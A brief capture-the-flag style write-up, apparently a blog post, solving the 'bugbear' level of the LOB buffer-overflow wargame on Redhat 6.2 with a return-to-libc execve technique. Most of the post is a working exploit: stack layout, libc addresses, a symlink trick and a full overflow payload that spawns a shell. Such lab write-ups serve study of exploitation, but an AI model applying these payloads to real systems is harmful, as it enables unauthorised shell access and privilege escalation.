
LOB Redhat 6.2 - bugbear

5unKn0wn 2015. 10. 30. 00:18


bugbear - RTL2

stack : *ret[4] + *execve_addr[4] + *execve_offset[4] + *lib_addr[4] + *fp[4] + buffer[40] + sfp[4] + ret[4]

execve : 0x400a9d48
exit : 0x400391e0

execve(filename, *argv[], 0) -> execve("/bin/sh", &"/bin/sh", \x00, &NULL)

Symbolic Link : ln -s giant `python -c 'print "\xf9\xbf\x0f\x40"'` (address of "/bin/sh")

"/bin/sh" : 0x400fbff9
&"/bin/sh", \x00 : 0xbffffff7
&NULL :  0xbffffffc

Payload : ./`python -c 'print "\xf9\xbf\x0f\x40"'` "`python -c 'print "A"*44 + "\x48\x9d\x0a\x40" + "\xe0\x91\x03\x40" + "\xf9\xbf\x0f\x40" + "\xf7\xff\xff\xbf" + "\xfc\xff\xff\xbf"'`"


Using RTL_execve